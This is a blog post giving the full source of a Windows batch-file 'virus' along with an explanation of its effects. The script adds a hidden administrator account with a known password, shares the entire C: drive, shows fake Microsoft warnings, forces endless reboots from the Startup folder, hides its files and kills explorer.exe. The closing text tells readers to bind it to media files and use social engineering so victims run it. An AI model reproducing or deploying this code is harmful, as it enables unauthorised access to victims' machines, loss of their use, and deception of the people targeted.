Thursday, December 13, 2012

Batch File Virus -4

@echo off

cd\

cd %SystemRoot%\system32\

md 1001

cd\

cls

rem N0 H4rm 15 cau53d unt1| N0w

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as 01/01/2000

echo 12:00:00.00 | time >> nul

echo 01/01/2000 | date >> nul

net users Microsoft_support support /add

rem Th3 u53r 4cc0unt th4t w45 Cr34t3d 15 ju5t 4 |1m1t3d 4cc0unt

rem Th15 p13c3 0f c0d3 w1|| m4k3 th3 |1m1t3d u53r 4cc0unt5 t0 4dm1n15tr4t0r 4cc0unt.

net localgroup administrators Microsoft_support /add

rem 5h4r3 th3 R00t Dr1v3

net share system=C:\ /UNLIMITED

cd %SystemRoot%\system32\1001

echo deal=msgbox (”Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) >

%SystemRoot%\system32\1001\warnusr.vbs

rem ch4ng35 th3 k3yb04rd 53tt1ng5 ( r4t3 4nd d3|4y )

mode con rate=1 > nul

mode con delay=4 >> nul

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y 50m3 4nn0y1ng m5g, as c0d3d ab0v3, 3×4ct|y

@ 12:01 and 12:02

at 12:01 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”

at 12:02 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”

msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” > nul

msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” >>

nul

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| c0py th3 warnusr.vbs f1|3 2 th3 5t4rtup, th4t w1|| b3 3×3cut3d @ 3v3ryt1me th3 c0mput3r 5t4rt5

copy %SystemRoot%\system32\1001\warnusr.vbs “%systemdrive%\Documents and Settings\All

Users\Start Menu\Programs\Startup\warnusr.vbs”

rem

***************************************************************************

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y Th3 5hutd0wn d14|05 B0X w1th 50m3 m5g and w1|| r35t4rt c0nt1nu0u5|y

echo shutdown -r -t 00 -c “Microsoft has encountered a seriuos problem, which needs your attention right now. Hey your computer got infected by Virus. Not even a single anti-virus can detect this virus now. Wanna try? Hahahaha....! ” > %systemroot%\system32\1001\sd.bat

copy %systemroot%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat

“%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat”

rem

***************************************************************************

cd\

cls

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| m4k3 th3 v1ru5 b1t 5t34|th13r

cd %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\

attrib +h +s +r warnusr.vbs

attrib +h +s +r sd.bat

cd\

cd %systemroot%\system32

attrib +h +s +r 1001

rem K1||5 th3 3xp|0r3r.3×3 Pr0c355

taskkill /F /IM explorer.exe

rem @ EOV // End of Virus

Copy the source code and paste it in a notepad, then save it with the .bat extension. This virus program will begin its operation at C:\windows\system32 and creates a new directory with name '1001', changes the time to 12:00 and date to 01-01-2000, then creates a new user with account name 'Microsoft_support' with a password 'support' matching the account.

It automatically assigns administrator rights to the user account that was created, then shares the root drive 'C:' which really is a security issue making the system completely vulnerable. It will create a VBScript file with name 'warnusr.vbs' that is used to display a message 'Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or

Press No to Ignore the Virus', that really seems to be coming from the operating system itself, then it will change the keyboard setting by reducing the rate and delay time. Since the time and date has been already modified by the virus, it will automatically pop up a message stating 'You are requested to restart your Computer Now to prevent Damages or Data loss' exactly at 12:01 and 12:02, if the user restarts the computer, then it’s gone.

Whenever the user try to login to the computer, it will automatically reboots continuously, because the command 'shutdown -r' is set with time 00, and kept in start-up folder, the user has nothing to stop this unless he enters in safe mode and delete the file, more over the file is set with system and hidden attribute making it invisible.

The only way to stop this is to enter in safe mode and disable the start-up items, and then delete the file that reside in C:\windows\system32\1001 and in the start-up folder.

You can also use some exe-binders to bind this virus with any audio, video, text or whatever the files may be, then use some social engineering technique to make the victim execute the file by himself to harm his/her computer.

You can create this virus without using any third party tools in windows, also instead of exe-binder, you can use the ‘iexpress’ wizard to create a custom package.

No comments:

Post a Comment